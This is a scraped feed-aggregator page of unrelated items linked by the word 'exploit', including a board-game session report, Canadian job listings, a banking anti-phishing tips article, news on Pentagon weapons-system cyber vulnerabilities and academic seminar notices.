          Thread: Smolensk: Barbarossa Derailed:: General:: Any tips for an OCS noob playing solo?      Cache   Translate Page      

by tdbrad7

I've played the half turn introductory scenario, and feel like I got to grips with the general flow of conducting an assault (hip shoot, overrun(s), barrage, attack, then repeat with reserves and units that gained exploitation mode), as well as how to use combat supply, but it didn't feel like it taught me much in terms of how to account for the possible actions of an enemy, nor how to plan for future turns.

I'm now setting up scenario 2 and am feeling quite overwhelmed. I hadn't quite anticipated just how huge this game would feel, despite only being one map, and while I had read up on the rules in advance, and felt like I'd understood them, now that the game is in front of me, I feel like the intricacies of how the different subsystems interact is much more complex than I had previously thought.

I've read the player notes for this game, as well as general tips for playing OCS games, but they don't really seem to be aimed at complete beginners, and focus more on what you're trying to achieve, rather than how the game rules can be used to help you achieve it. I'm aware that what I'm probably looking for is the detailed walkthrough that comes with Reluctant Enemies (which I have looked at online briefly, but would mean much more if I could have the game set up in front of me), but I'm not really in a position to buy another game when I've barely touched this one.
          Session: Rise and Decline of the Third Reich:: A legendary 3R game - Part 16: Summer 1940 Allied Turn (Full Turn)      Cache   Translate Page      

by kostaskav

The allied gamble to finish off Germany:
The allied Anglo-French headquarters have now decided that the time has come to finish Germany off and all but end this game: There is clearly an opening: Even without air superiority, a 2-1 in Brussels is all but a guaranteed success, as the allies can sea transport units next to Brussels and can always guarantee enough of air support to DAS intercept the maximum 9AF that Germany can commit. The big question is how to take this a step further. The key the big victory is the survival of the surrounded French armor corps at N27. If it survives, the bulk of German forces in Belgium will be unsupplied and unable to threaten France next turn. There are even more grandiose plans drafted for a southern “pincer” that will result to a complete defeat of Wehrmacht. Of course all these are theoretical as the Germans have 20AF vs 18AF for the allies. In this situation the rule of thumb is that you don’t declare an offensive without air superiority. However the allies hope to deceive the Germans and force them to overcommit their DAS in one part of the front thus leaving openings in different parts of the front in order for the offensive to bear fruit. For example, if 9AF of DAS are committed to Brussels and the allies choose not to fully DAS intercept they may have enough forces available to DAS intercept elsewhere…The allies can always manage an 1-1 with a close to 50% chance of success in resupplying the isolated French armor even without ground support. The joint Anglo-French conference opts to shed 60BRP for a joint Western offensive that also has the advantage of finishing off Norway and getting this hassle out of the way…The drawback is that builds have to be kept to a minimum to prevent the threat of an Axis double turn that will mean the Fall of France or even worse…

Here is the situation in the West just before the allied offensive begins: Please note that there are 13FF in Bremen and 1FF in Kiel. This has corrected a “carryover error” from part 14. (See prior commentary)



What about the Soviets? Obviously they want to get rid of the Greek thorn on their side as soon as possible in order to concentrate in a potential German threat. They will opt for an offensive option.

Option Selections:

UK and France will take two offensive options in the West, while taking a joint attrition in the Med. USSR will declare an offensive in the Med and pass in all other fronts
New BRP levels are UK: 90(58), France: 65(32), USSR 108(47)
No voluntary destruction of units.

Movement of fleets:

Russians will not move any fleets. The UK and France announce the following fleet movements:

1) 18FF from Gibraltar to Plymouth (path as far from German interception as possible). UK will rearrange the counters from 9-8-2 to 9-9-1 (always allowed to do rearrangements to generate more 9FF counters)
2) 9FF from Brest to Calais

The Germans choose to intercept with 13FF from Bremen at Plymouth hex (11-20 range success with 1-4) and roll a 1 (successful).
The remaining French Atlantic fleet at Lorient chooses to intercept at L23 (1-10 range) and are also successful rolling a 3.
The situation just before resolution of naval battles is shown below:



The Franco German naval battle at L23 rolls a 5-3. There is an overall +3DRM for Germans (+2 for Nationality, +1 for size). This means that the French go to -1 overall, losing 1NF, while the Germans continue without a scratch towards intercepting the Royal Navy at Plymouth.
The German British naval battle at Plymouth rolls 2-6. The overall DRM is 0, as UK has +1 for Size and Germany +1 on Nationality DRM difference. Germans will lose 4FF and UK will lose 2FF, but the fleet movement will be successfully completed.
Here is the situation just after completion of the fleet movement:



Now, you may wonder why did the allies choose to move their fleets. Gibraltar fleets can do Sea Transport missions, as well as Plymouth fleets! There were two reasons: Having more UK fleets at home also allows SR to France and Gibraltar is essentially free of Seaborne invasion threats considering how decimated the German fleets are and with no Italy in the game. But -more importantly-the allied fleet movement aimed two lure the Germans into a naval battle so that the German fleets are unusable during the Axis turn and also for the remaining of the allied turn: There will be no more threat through the “capture an airport by an airdrop and SR a unit into Britain” trick, so barely any need for home defenses. Futhermore the naval battle gave more fragments that are useful as supply fleets. And there will be no interception of the massive allied Sea Transport Mission. The British Admiralty is high-fiving...
6FF will be designated as supply fleets from Scapa Flow to Bergen and Antwerp

Air and ground movements:

The Russians will move their eastern defenses closer to the front, worrying about some German surprise attack…
They will also move into Greek territory also occupying one Albanian hex and preparing to assault the Greek unit at CC27 with a likely exploitation to the DD27 hex next to Athens. They don’t try to commit more AF than the necessary 5 AF from Izmir, apparently intending to preserve their airbase counters for future use.
Here is the situation post movement in the Greek front:


The French move shows the Allied grand plans unfolding. Note the strategic position of the French armor at Metz! It is adjacent to both infantry stacks at P25 and Luxembourg. The isolated French armor at N27 can open the breakthrough by attacking either the Frankfurt 4-6 panzer corps or alternatively the Bonn infantry unit, thus forcing the Germans to split their DAS on two hexes. If the Germans fail to notice the danger the French armor at Metz can exploit deeply into the German rear essentially handing Hitler a humiliating defeat by the French in conjunction with some British progress in Belgium! This would be essentially a "game-over" situation for the beleaguered Germans…
The British do some inconsequential movements in Egypt, prepare to assault Oslo with 2X3-4 and 2AF from Bergen, and are also positioned to take Brussels. They will also displace the 2NF from Venice to Tobruk. Their attempt to intercept this Italian movement from Venice to Tobruk with 1NF from Gibraltar fails.
Here is the situation post-movement in the West:



It seems that the allies have “choked” at the most critical stage of this game committing some unimaginable blunders!
The positioning of the RAF trying to secure Brussels (or preserving the RAF for the Axis turn) rather than supporting the French offensive is hard to explain. The 2AF needed NOT be diverted to Norway, as a sea transported unit could do the job. Instead 15 AF of RAF should have been used to counterair the 15AF German superstack at Cologne/Essen so that it is not available during the German turn. The remaining 1AF should have been used on N26 to make the possible 1-1 attack there a 8 vs 6, while the 3 French AF should have been saved for possible DAS interception on Frankfurt or for defense purposes next turn. Now the Germans have only 5 AF left for DAS. If they wanted to secure Frankfurt they could still allocate 4AF on Frankfurt and 1AF on Bonn, but still the French have a chance to win the dogfight…
More importantly the Germans would have no AF left for their turn and Anglofrench cooperation rules favor joint attacking, while joint defending is much less effective.
Instead the allies try a deception tactic hoping the Germans will not allocate much DAS and then surprise them with ground attacks. For example if the Frankfurt or Bonn attacks 1-1 succeeded with AAC (Advance after combat) and either the French armor survived, or another one exploited from Metz, another 1-1 on Q26 could encircle more armors….

Overall map after movement:


Missions:


Russians:
1) 1AF (Izmir) CA 1AF on Athens. Greek AF is eliminated. Russian AF survives and returns to Izmir
2) 2AF (Izmir) of GS on CC27
3) 9FF Seaborne Invasion on CC26 from Istanbul carrying 1X3-5
4) 9FF Seaborne Invasion on CC26 from Izmir carrying 1X3-3

French:
1) 4FF ST 1 x 2-3 to Marseilles and No air missions
UK:
1) 2AF GS on Oslo
2) 6FF from Plymouth carrying a 1-3 ST on Antwerp.
3) 1FF from Plymouth joins 1FF from Scapa Flow and then 8FF from Cherbourg for ST to Antwerp carrying the 3-4 in Cherbourg. Fleet joins path of mission 2).

DAS and Interception decisions:
1) Germans commit 6AF (1AF from Wilhemshaven and 5AF from Leipzig) on Frankfurt.

DAS Interception decisions:
1) British commit 5AF from Antwerp for DAS interception on Frankfurt.

Here is the overall map showing all missions:

Pls note that there are a couple of small errors in the picture above.
1) Somehow it shows 1AF of Russian GS, not 2 as it should.
2) Somehow a 9FF from Scapa flow was accidentally picked up together with the other fragments. this needs to be ignored.



Here is the situation before DAS interception resolution in the West:


British roll a 3-5 losing the DAS interception and 3AF while 2AF get inverted in Antwerp. Germans lose 1AF from Leipzig and continue their DAS mission.

Here is the situation after conclusion of all missions and before ground combat roll resolution in the West:


And in the Med:


Overall map just before ground combat rolls. Note that the error in Russian GS has been corrected, but not the one with the wrongly picked up fleet from Scapa Flow.


Ground combat rolls:
USSR: 2x3-5 and 2AF of GS vs 2-3 Greek unit at CC27 8 vs 4 2:1. Roll is a D
UK: 2x3-4 and 2AF of GS in Oslo, 8 vs 4 2:1. Roll is EX-CA. Norway conquered
France: 2x2-3 from Luxembourg and 1 X 3-5 vs. Bonn 3-3 7 vs 6, 1:1. Roll is EX
France 4x2-3 vs 4-6 in Stuttgart 8 vs 8 1:1 Roll isD
UK 2 x 4-5 and 2 x 3-4 vs 1 x 3-3 in Brussels 14 vs 6 2:1 Roll is EX
There will be no exploitation movement
Ahead of exploitation combat, the Russians announce 2AF of GS from Izmir against DD27 in Greece

Here is the situation post Combat not including exploitation in the West:

And in the Med just before exploitation combat:

Exploitation combat (2X3-5 and 2AF vs 2-3(doubled) in Greece rolls an EX for the Russians.
There is no Med attrition roll for UK and France, as there are no units in contact anywhere.

Here is the Post combat phase overall situation: Note that there were some misallocation of prior files which German units did DAS and which were inverted. It is corrected now…


UNIT CONSTRUCTION:
USSR will spend 6 BRP for construction building the lost 3-5 during exploitation in Greece.
USSR BRP at 102 (35)
UK: 1x5-4, 4x3-4, 1replacement. A total of 28BRP. Down to 62(30)
France: 1x5-4, 1x3-5, 4x2-3, 3replacements. A total of 32BRP. Down to 33(0)
Overall map after builds and before SR phase: Note that I now corrected the accidentally picked up uncommited 9FF from Scapa Flow which are used for Sea Escort.


SR phase

France:
1) French Replacement to Venice
2) French rep to T25
3) 3AF from Metz to Q20
4) 2-3 from Marseilles to Metz
5) 4FF from Beirut to Lorient
UK:
1-4) 4X3-4 from UK mainland and Norway to O23 and P23 in France and to Rome using 4x9FF for Sea Escort
5) Rep to Portsmouth from J25
6) And 7) 3-4 and 1-4 AF to Rennes and Caen

Soviet Union
1) 1-3 from Rostov to L38
2) 2-3 from Rostov to BB27
3) 3-5 to Salonika
4+5) 2 x 3-3 1hex west from Salonika
6) 5 (2-3) to BB27
Here is the board post SR:


And at the end of turn after removal of unsupplied French 2-3 in Dieppe.

Western Allies end up with 95 BRP which is the exact same total as the Germans. They are guaranteed to maintain the initiative.


Summary:
The allies had objectively a bad turn, and not only in terms of rolls, but more importantly also in terms of strategy and tactics. Their grand plan was to “trick” the Germans to overcommit their AF but it backfired royally, as the Germans used exactly the minimum 5AF to spoil the allied grand plan. The French defense now has a notable weakness in the North, where the Germans can attack relentlessly solely on the French and ignore the British, while they still enjoy overwhelming air superiority. The allies should have air-attritioned the Germans and force them to commit as much DAS as possible but they failed to do so. With all their hopes pinned up on a coin-toss 1-1 attack, and no effective defense against the panzers the French now seem quite vulnerable. The airborne is not ZOCed, and from Wilhemshaven is a threat to both England and Paris. Norway was conquered by UK…but it did cost valuable BRPs…The Russians had some success in Greece, but with fall of France looking imminent, they better watch their back…Overall, it seems that the allies are ready to pay for their arrogance next turn. More to come, soon! Stay tuned!

          Spécialiste en exploitation de systèmes Linux 3112904 - Morgan Stanley - Montréal, QC      Cache   Translate Page      
Doit avoir une solide connaissance et une excellente expérience de Linux, préférablement Red Hat ou d’autres distributions de Linux.-Solide connaissance et...
From Morgan Stanley - Sun, 16 Sep 2018 09:21:11 GMT - View all Montréal, QC jobs
          Spécialiste, développement et exploitation (DevOps) 3117231 - Morgan Stanley - Montréal, QC      Cache   Translate Page      
Ant, Gradle ou d’autres outils et cadres similaires– Expérience avec Jenkins, Sonar, Fortify, BDD, Selenium et d’autres outils standards de couverture et d...
From Morgan Stanley - Mon, 30 Jul 2018 21:25:46 GMT - View all Montréal, QC jobs
          First study of migrant sex workers      Cache   Translate Page      

The majority of migrant sex workers in New Zealand who participated in new University of Otago research, are in safe employment situations and working to fund study or travel rather than being desperate, exploited or trafficked, the research shows.


          Part-Time Professor - Network Systems and Components - Durham College - Oshawa, ON      Cache   Translate Page      
This is a necessary foundation for further investigations and the testing of remedial actions covered in in the Access Controls, Hacking &amp; Exploits and Network...
From Durham College - Wed, 26 Sep 2018 07:27:59 GMT - View all Oshawa, ON jobs
          Rockford Scanner™: Rockford Man Exposes Penis To A Young Girl Walking To School      Cache   Translate Page      
    EXPLOITATION ARREST: A Rockford man faces charges after a weeks-long investigation. Detectives from the Sensitive Crimes Unit conducted an investigation after a juvenile walking to Gregory School (4820 Carol Court) on September 19, 2018, reported that a man exposed himself to her. On Tuesday, October 9, 2018, officers took 26-year-old Darren Coleman into …
          Optimization of conditions to extract high quality DNA for PCR analysis from whole blood using SDS-proteinase K method.      Cache   Translate Page      
Icon for Elsevier Science Related Articles

Optimization of conditions to extract high quality DNA for PCR analysis from whole blood using SDS-proteinase K method.

Saudi J Biol Sci. 2017 Nov;24(7):1465-1469

Authors: Qamar W, Khan MR, Arafah A

Abstract
In case of studies associated with human genetics, genomics, and pharmacogenetics the genomic DNA is extracted from the buccal cells, whole blood etc. Several methods are exploited by the researchers to extract DNA from the whole blood. One of these methods, which utilizes cell lysis and proteolytic properties of sodium dodecyl sulfate (SDS) and proteinase K respectively, might also be called SDS-PK method. It does not include any hazardous chemicals such as phenol or chloroform and is inexpensive. However, several researchers report the same method with different formulas and conditions. During our experiments with whole blood DNA extraction we experienced problems such as protein contamination, DNA purity and yield when followed some SDS-PK protocols reported elsewhere. A260/A280 and A260/A230 ratios along with PCR amplification give a clear idea about the procedure that was followed to extract the DNA. In an effort to increase the DNA purity from human whole blood, we pointed out some steps of the protocol that play a crucial role in determining the extraction of high quality DNA.

PMID: 30294214 [PubMed]


          BCEJP00017403 - Analyste principal sécurité - Modis Canada - Montréal, QC      Cache   Translate Page      
Analyste principal sécurité Assure la planification, la conception, la construction et l'exploitation des réseaux de la compagnie de plusieurs milliards de...
From Modis Canada - Fri, 05 Oct 2018 21:37:09 GMT - View all Montréal, QC jobs
          Pentagon slow to protect weapon systems from cyber threats: U.S. agency      Cache   Translate Page      
The Pentagon has been slow to protect major weapon systems from cyber attacks and routinely found critical vulnerabilities that hackers could potentially exploit in those systems, a federal government report said on Tuesday.
          5 Ways Banks Can Combat Phishing       Cache   Translate Page      
5 Ways Banks Can Combat Phishing phil.goldstein_6191 Tue, 10/09/2018 - 08:21

More than a third — 35.7 percent — of the 107 million attempts to visit phishing pages halted by Kaspersky Lab technologies in the second quarter of 2018 were related to financial services, the company recently reported.

Customers were targeted primarily via fraudulent banking or payment pages, the report states. Those insights point to the need for consumers to exercise extreme caution when browsing online banking sites. Attacks on financial organization customers, including banks, payment systems and e-commerce transactions, remain a continuing trend in cybercrime. Typically, those crimes result in theft of money as well as personal data

“The permanence of attacks targeting financial organizations reflects the fact that more and more people use electronic money,” observes Nadezda Demidova, lead web content analyst at Kaspersky Lab. “Still, not all of them are sufficiently aware of the possible risks, so intruders are actively trying to steal sensitive information through phishing.”

While there’s a lot of good information available to help customers improve their security awareness, what can banks do to better protect themselves from ever-increasing phishing threats? 

“Phishing techniques are similar across all industries, but it’s clear that some organizations — like banks — can experience more immediate and severe repercussions from a successful attack, just based on the nature of their business and the sensitivity of the customers they support,” says Gretel Egan, security awareness and training strategist for Wombat Security, a division of Proofpoint

In speaking to Egan and Steven D’Alfonso, a research director at IDC Financial Insights, we developed the following list of five tips for banks and credit unions:

MORE FROM BIZTECH: Discover why advanced video surveillance tech is a solid investment for banks! 

1. Identify Staff Who Have Opportunity and Access

Banks should identify staff members beyond the C-suite and management teams who have access to customer information and other business-critical data and systems, because cybercriminals certainly have, Egan says. Attackers mine social media and public websites, among other sources, to identify key individuals, such as loan officers, before targeting them directly. 

2. Get Serious About Security Awareness Training

Employees who transfer funds regularly, manage sensitive data or participate in important business functions need additional training on how to spot and avoid more sophisticated phishing traps, Egan says. Cybercriminals frequently exploit employees’ fear and anxiety to solicit a quick (or unsafe) responses via email targeting. It’s a good idea for users to ask themselves these questions about any email they receive: Was I expecting this message? Does this email make sense? Am I being pushed to act hastily or out of fear? Does this seem too good to be true? What if this is a phishing email?

3. Focus on Public-facing Information

Bank and credit union technology teams should communicate with marketing and C-suite teams about the potential hazards of sharing company details on public channels such as public-facing websites or social media, Egan advises. That can be a double-edged sword in the banking world, where organizations strive to make it easy for customers to contact them, while still offering protection from cybercriminals and social engineers. Egan cautions that if information such as general email aliases, phone numbers, or lists of bank staff and their roles are visible publicly, cybercriminals will use the information to launch phishing attacks. IT staff should monitor all inbound email channels (even aliases) and train personnel who respond to inbound communications to recognize and avoid malicious messages.

4. Deploy Products that Analyze Malwarelike Behavior

Banks should consider deploying tools such as IBM’s Trusteer Rapport, which uses advanced analytics and machine learning to analyze suspicious behavior, increasing the chances that the software will detect and remove malware before it can infect a computer or broader network, IDC’s D’Alfonso says. Many banks now offer Trusteer as a free service for users to download before continuing any e-commerce functions. 

5. Consider Continuous Authentication

Behavior biometric products that feature continuous authentication can detect nonauthorized users, such as a fraudster or a bot, D’Alfonso says. Such new tools help users safely authenticate and transfer money or pay bills, while continuous authentication keeps watch during every step of the process. 

Staying on top of phishing requires consistent training and adjustments on the part any organization looking to combat ever-evolving threats. And while new behavioral and analytics tools can help, banks and credit unions can also achieve a great deal simply by keeping better tabs on employees and offering frequent training updates.

Cybersecurity-report_EasyTarget.jpg


          Mauritania: Senior Executive Associate, GS6,Nouakchott, Mauritanie      Cache   Translate Page      
Organization: UN Children's Fund
Country: Mauritania
Closing date: 23 Oct 2018

UNICEF works in some of the world’s toughest places, to reach the world’s most disadvantaged children. To save their lives. To defend their rights. To help them fulfill their potential.

Across 190 countries and territories, we work for every child, everywhere, every day, to build a better world for everyone.

And we never give up.

For every child, [insert tagline]

Mauritania, officially named the Islamic Republic of Mauritania, is a West African country. It has borders with Algeria, Western Sahara, Mali and Senegal, and access to the Atlantic Ocean, which look like straight lines because they were drawn by a colonizing country, France. Its capital is Nouakchott.

This country is very arid. A large part of its territory is desert, which explains the small number of the population despite its large surface area. The population density, in terms of the number of people per square kilometer, is low (about 3 people per km²).

UNICEF mission is to promote the rights of every child, everywhere, in everything the organization does - in programmes, in advocacy and in operations.

How can you make a difference?

This position reports to a senior executive with responsibility for the management and coordination of work for a broad segment of the Organization (i.e. major program, sector, or office). The role of this post is to provide administrative and secretarial support services to the senior executive.

The Sr. Executive Assistant is responsible to ensure the smooth running of the Office. This involves management of information and coordination of matters within a substantive team. The post is a key interface with a broad range of contacts including high-ranking officials, both within and outside the Organization. The post prioritizes tasks and organizes work independently based on general direction from the supervisor.

To qualify as an advocate for every child you will have…

  • Completion of Secondary School Education. High School Diploma, and business courses or other relevant disciplines
  • A minimum of 6 years of experience in accounting, financial or budget work, including on the job training in accounting and financial procedures and systems. Knowledge and skills in using corporate financial systems as well as standard office computer applications.
  • Five years of office support work experience, including, organizing and supervising the whole range of office support and administrative activities. Ability to work with minimum of supervision. Ability to extract and format data and to solve operational problems. Ability to organize own and others work, set priorities and meet deadlines. Ability to organize meetings and events. Ability to handle work quickly and accurately under time constraints
  • Fluency in French and English is required. Knowledge of Arabic is an asset.
  • For every Child, you demonstrate…

    UNICEF’s core values of Commitment, Diversity and Integrity and core competencies in Communication, Working with People and Drive for Results.

    UNICEF has a zero-tolerance policy on sexual exploitation and abuse, and on any kind of harassment, including sexual harassment, and discrimination. All selected candidates will, therefore, undergo rigorous reference and background checks.

    The technical competencies required for this post are….

    View our competency framework at

    http://www.unicef.org/about/employ/files/UNICEF_Competencies.pdf

    UNICEF is committed to diversity and inclusion within its workforce, and encourages all candidates, irrespective of gender, nationality, religious and ethnic backgrounds, including persons living with disabilities, to apply to become a part of the organization.

    Remarks:

    Mobility is a condition of international professional employment with UNICEF and an underlying premise of the international civil service.

    Only shortlisted candidates will be contacted and advance to the next stage of the selection process.


    How to apply:

    UNICEF is committed to diversity and inclusion within its workforce, and encourages qualified female and male candidates from all national, religious and ethnic backgrounds, including persons living with disabilities, to apply to become a part of our organization. To apply, click on the following link http://www.unicef.org/about/employ/?job=516839


              Foothill Brings CG Sitcom ‘Danny & the Dinogons’ to MIPCOM      Cache   Translate Page      
    Foothill Entertainment Inc., has joined with India’s Storywalker Designs, creators of the popular app Storywalker 365, to develop, finance and exploit the new series Danny and the Dinogons. Intended as a CGI preschool sitcom that celebrates family, diversity and kindness, the series debuts at MIPCOM this month. The show is about the not so normal […]
              Alle origini di Bentancur, certezza della Juve      Cache   Translate Page      

    Alle origini di Bentancur, certezza della Juve

    Primo gol con la Juve per il talento classe 1997, exploit dedicato alla mamma Mary scomparsa quando aveva quattro anni e che ricorda sulla maglia e sulla pelle. "Lolo" è cresciuto in fretta sia in altezza sia sul campo: merito dell'umiltà e della vicinanza della famiglia. Punto fermo nell'Uruguay di Tabarez, più di un'alternativa per la squadra di Allegri

    UDINESE-JUVE 0-2, BENTANCUR E CR7 A SEGNO. GOL E HIGHLIGHTS

    SERIE A, I RISULTATI - LA CLASSIFICA

    Parole chiave: serie a,juventus

              An alarming report shows hackers can break into US weapons systems in less than an hour - Business Insider      Cache   Translate Page      

    Business Insider

    An alarming report shows hackers can break into US weapons systems in less than an hour
    Business Insider
    A new Government Accountability Office (GAO) report shows Department of Defense vulnerabilities stemming back to the 1990s. Hackers used unsophisticated, easily accessible equipment to access a DoD weapons system in only one hour. Current ...
    Government watchdog says US weapons systems are vulnerable to hacks, but the Pentagon is slow to actTechCrunch

    all 297 news articles »

              10/10/2018: BUSINESS: Taxman sues over alleged R&D rort      Cache   Translate Page      
    Disgraced tax accountant Paul Bogiatto used a call centre to lure customers into a research and development tax exploitation scheme, a court has been told. The Australian Taxation Office has launched Federal Court action against Mr Bogiatto, who was...
              VMware's CEO has a vision that should terrify the security industry: 'Start getting rid of products' (VMW)      Cache   Translate Page      

    VMware CEO Pat Gelsinger

    • In an interview on Monday at the Best of Breed conference, VMware CEO Pat Gelsinger said that right now, companies are using too many security products — grim tidings for anybody trying to sell security products to those companies. 
    • By using multiple products, they're creating more cracks in their security infrastructure, where attackers could hypothetically get in.
    • Gelsinger says the goal is to reduce the number of security products used to help protect VMware itself down to 15. 
    • To do this, VMWare will build more security features directly into its own products.

    The problem with the security industry, says VMWare CEO Pat Gelsinger, is that companies are using too many security products. If you want to be more secure, he says, "start getting rid of products."

    Indeed, Gelsinger's big idea for disrupting cybersecurity is to get companies using fewer security products, and rely more on products that already have security baked in, he said in an interview with CRN on Monday at the 2018 Best of Breed conference in Philadelphia.

    About two years ago, VMWare used 30 security products to protect its own employees and systems from cyberattack, but now it uses fewer than 20. The lesson, he says, is that VMware is now both more secure, and less reliant on piling on new tools from outside vendors.

    “Your customers are looking for more and just giving them another warm blanket, expecting that’s going to stop bullets doesn’t do it,” Gelsinger said. “Your customers want less products, they want more value — and particularly in the security area that’s true. We think VMware is a critical component of that as you’re building those capabilities.”

    Gelsinger says the goal is to reduce VMware's usage of security products even further, down to 15 security solutions, which the company will do by building more basic security functions and encryption directly into its own products, including NSX, vSan and AppDefense. That vision could be bad news for the very many security startups out there, who are all selling to a finite number of businesses in the world. 

    Having fewer security products may seem counterintuitive as a way to fight cyberattack, but too many security products can create opportunity for attackers. A complicated, patchwork security infrastructure can slow down the detection of threats and makes it easier for attackers to find and exploit any software vulnerabilities. The average enterprise deploys 75 different security products, according to SafeBreach, an internet security company. Gelsinger also cited a meeting he had with a CIO of a top bank, who said that his company uses 250 security vendors.

    "How do you make all that work, right? The patches of the patches, and integration—it's just nuts and that has got to get much simpler," Gelsinger said.

    It may take a few years before Gelsinger and VMware successfully reduce their reliance on dedicated security tools —  but ultimately, the company hopes to have fewer external vendors and platforms to rely on, while making its own infrastructure platform more secure. In the meanwhile, he urges companies to encrypt their data, so it can't be cracked even in the event of a security incident.

    “You should always have data encrypted,” Gelsinger said. “There’s still lots of breaches, but this dramatically reduces the attack surface.”

    Read the full interview with CRN here.

    Join the conversation about this story »

    NOW WATCH: One bite from this tick could ruin red meat for the rest of your life


              Foothill Brings CG Sitcom ‘Danny & the Dinogons’ to MIPCOM      Cache   Translate Page      
    Foothill Entertainment Inc., has joined with India’s Storywalker Designs, creators of the popular app Storywalker 365, to develop, finance and exploit the new series Danny and the Dinogons. Intended as a CGI preschool sitcom that celebrates family, diversity and kindness, the series debuts at MIPCOM this month. The show is about the not so normal […]
              The 1% Windfall: How Successful Companies Use Price to Profit and Grow      Cache   Translate Page      

    “This breakthrough ‘how to’ book offers a practical and comprehensive framework that shows companies how to use price to drive profits from diverse customer segments in offensive and defensive (recession, inflation, and new competitor) situations.” — Richard Spaulding, Member of the Board of Directors, Scholastic Corporation Rafi Mohammed, author of The Art of Pricing, shows businesses how to reap financial windfalls and sustain growth using the underexploited and often overlooked strategy of setting prices. .
              New did guys assisted surprised defense wholesale nfl jerseys from china      Cache   Translate Page      
    For example, improving RB as a power back might mean boosts strength Cheap NFL Jerseys Nike and stiff arm, while a receiving back might get boosts agility and catching. One of the things that I want to try to do is to make sure we are the best position to win. He clicked with a […]
              Oct 9, 2018: AIM Seminar: Training Neural NLP Models in Minimally Supervised Settings at Northeastern University      Cache   Translate Page      

    Speaker: Byron Wallace (CCIS, NU)

    Abstract: Modern neural models have achieved remarkably strong results in natural language processing (NLP) in recent years, achieving state-of-the-art performance across a range of domains and tasks. However, such models tend to be data-hungry, requiring large annotated training corpora to work well. This requirement impedes their use in specialized domains wherein direct supervision is expensive to collect, and hence sparse. I will discuss strategies for training such models with minimal labeled data. In particular these include strategies for active learning (AL) and approaches that exploit domain knowledge and other sources of indirect supervision. Finally, I will discuss approaches to efficient model transfer, including learning disentangled representations of texts.

    View on site | Email this event


              Oct 10, 2018: GASC Seminar "Roots of polynomial systems, Hilbert scheme, and singular points" by Bernard Mourrain (INRIA: Sophia Antipolis, U. Cote d'Azur) at 511 Lake Hall      Cache   Translate Page      

    Abstract: A key ingredient in computer algebra for solving polynomial equations is the computation of a normal form, via a good presentation of the ideal generated by these polynomials. This can involve a Groebner basis or border basis computation. From such a normal form, one can then deduce the algebraic structure of the quotient algebra and effectively recover all the solutions of the equations.

    We are interested in analyzing normal forms which are known partially. We first present algorithmic characterizations of normal forms based on commuting relations and rank conditions. We show how these lead to efficient methods for finding roots of polynomial equations, which we illustrate by some numerical experimentation.

    We show how one can deduce equations for the variety of Artinian algebras associated to r roots with a given basis. We develop the connection with the Hilbert scheme of r points, providing defining equations of degree 2 in the Plucker coordinates of the Grassmannian of r-spaces.

    In a more local setting, the characterization of normal forms can be used to define deflated systems of equations defining a multiple root and its inverse system. The singular isolated root of the initial system corresponds to a simple root of this extended system. We show how to exploit it in numerical iterative methods such as Newton iteration to obtain a quadratically converging method to a singular isolated root. Some examples illustrate the approach.

    This involves works done in collaboration with Mariemi Alonso, Jerome Brachat, Jonathan Hauenstein, Agnes Szanto, Simon Telen, Marc Van Barel.

    View on site | Email this event


              Adjointe – Exploitation, énergie éolienne et solaire | #ADM172 - innergex - Windthorst, SK      Cache   Translate Page      
    JOB POSTING #ADM172 POSITION: ASSISTANT – OPERATIONS, WIND AND SOLAR ENERGY WINDTHORST, TEXAS (USA) COMPANY PROFILE Innergex Renewable Energy Inc. is a...
    From innergex - Thu, 04 Oct 2018 18:55:39 GMT - View all Windthorst, SK jobs
              UToledo study details link between social media and sex trafficking      Cache   Translate Page      
    (University of Toledo) Social media is increasingly being exploited to contact, recruit and sell children for sex, according to a study by The University of Toledo Human Trafficking and Social Justice Institute. (Source: EurekAlert! - Social and Behavioral Science)

    MedWorm Message: Have you tried our new medical search engine? More powerful than before. Log on with your social media account. 100% free.


              Michal Pavlas, Petr Matijka      Cache   Translate Page      
    These horny homosexuals are truly passionate in their love-making. They wake up after a long night's sleep to a passionate kiss, regardless of the filthy cock breath from their exploits the night before. Things don't stop there, as one man rolls over on top of the other, pinning him down and running his hands all over his hard body.
              Transport, Propriétaire exploitant - Williams Pharmalogistique - Saguenay, QC      Cache   Translate Page      
    Williams Pharmalogistique est à la recherche d’entrepreneurs en transport ayant les équipements suivants pour les régions de CHICOUTIMI / SAGUENAY:....
    From Indeed - Wed, 08 Aug 2018 14:42:45 GMT - View all Saguenay, QC jobs
              Mécanicien(ne) de véhicules lourds (Banque de candidatures) - ArcelorMittal Exploitation minière Canada s.e.n.c. - Fermont, QC      Cache   Translate Page      
    Veuillez noter que ce poste nécessite un déménagement dans la ville de Fermont. Rebâtir, réviser, réparer et régler tous les équipements munis d'un moteur à... $39.76 an hour
    From ArcelorMittal Exploitation minière Canada s.e.n.c. - Wed, 26 Sep 2018 20:46:11 GMT - View all Fermont, QC jobs
              Conducteur(trice) d'équipement minier (Banque de candidatures) - ArcelorMittal Exploitation minière Canada s.e.n.c. - Fermont, QC      Cache   Translate Page      
    Veuillez noter que ce poste nécessite un déménagement dans la ville de Fermont. Sous la supervision du contremaître des opérations minières, les titulaires... $35.78 an hour
    From ArcelorMittal Exploitation minière Canada s.e.n.c. - Wed, 26 Sep 2018 20:45:54 GMT - View all Fermont, QC jobs
              Mécanicien(ne) d'entretien (Banque de candidatures) - ArcelorMittal Exploitation minière Canada s.e.n.c. - Fermont, QC      Cache   Translate Page      
    Veuillez noter que ce poste nécessite un déménagement dans la ville de Fermont. Relevant du contremaître du service concerné, les mécaniciens effectuent les... $39.76 an hour
    From ArcelorMittal Exploitation minière Canada s.e.n.c. - Wed, 26 Sep 2018 20:45:48 GMT - View all Fermont, QC jobs
              Boutefeu - ArcelorMittal Exploitation minière Canada s.e.n.c. - Fermont, QC      Cache   Translate Page      
    Veuillez noter que ce poste nécessite un déménagement dans la ville de Fermont. Préparer les trous de forage pour le sautage tels que :.... $38.44 an hour
    From ArcelorMittal Exploitation minière Canada s.e.n.c. - Wed, 26 Sep 2018 20:45:39 GMT - View all Fermont, QC jobs
              Forrest Gump (Blu-Ray)      Cache   Translate Page      
    Les exploits extraordinaires d&rsquo;un simple d&rsquo;esprit tour &agrave; tour h&eacute;ros de guerre, armateur de crevettiers, champion de ping-pong et star du football. &nbsp;
              Punk Rock bakelit falióra Exploited Che Guevara - Jelenlegi ára: 3 390 Ft      Cache   Translate Page      

    Punk Rock bakelit falióra Exploited Che Guevara
    Jelenlegi ára: 3 390 Ft
    Az aukció vége: 2018-10-10 03:27
